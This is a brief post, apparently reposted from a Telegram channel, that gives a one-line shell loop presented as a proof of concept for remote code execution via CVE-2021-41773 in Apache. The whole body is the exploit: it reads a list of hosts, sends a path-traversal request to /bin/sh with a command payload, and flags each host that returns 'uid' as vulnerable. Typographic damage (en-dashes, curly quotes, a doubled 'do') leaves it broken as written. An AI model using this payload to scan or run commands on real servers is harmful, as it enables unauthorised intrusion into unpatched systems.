October 7, 2021 at 01:35AM

■■■■■ Update : CVE-2021-41773 POC as RCE.

cat file | while read host do ; do curl –silent –path-as-is –data “echo;id” ‘$host/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh’ | grep “uid” && echo “$host \033[0;31mVuln\n”|| echo “$host \033[0;32mNot\n”;done

Source: Rohit

https://t.me/cKure/9668